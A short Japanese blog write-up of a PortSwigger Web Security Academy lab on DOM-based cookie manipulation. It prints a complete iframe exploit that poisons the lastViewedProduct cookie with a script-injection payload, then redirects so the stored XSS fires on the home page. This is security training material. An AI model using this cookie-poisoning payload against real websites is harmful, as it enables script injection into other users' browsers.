Hello there, ('ω')ノ

 

DOMベースのCookie操作を。

 

このラボでは、DOMベースのクライアント側のCookie操作について説明して。

ラボを解決するには、別のページにXSSを発生させるCookieを挿入して。

 

まずは、Last viewed productメニューを表示させてクリックすると。

 

 

パラメータが確認できて。

　/product?productId=1

 

 

さらにはCookieへの保存も確認できて。

　lastViewedProduct=https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net/product?productId=1

 

 

下記のエクスプロイトを保存して。

 

<iframe src="https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net/product?productId=1&'><script>alert(document.cookie)</script>" onload="if(!window.x)this.src='https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net';window.x=1;">

 

iframeが初めて読み込まれると、ブラウザは一時的に悪意のあるURLを開いて。lastViewedProductCookieの値として保存されて。

 

onloadは、ホームページにリダイレクトして。

被害者のブラウザにポイズンされたCookieが保存されている間は。

ホームページをロードするとペイロードが実行されて。

 

 

Deliver exploit to victimで、送信すると。

 

 

クリアできた。

 

 

ちなみにView exploitでエクスプロイトを確認してみると。

 

 

Best regards, (^^ゞ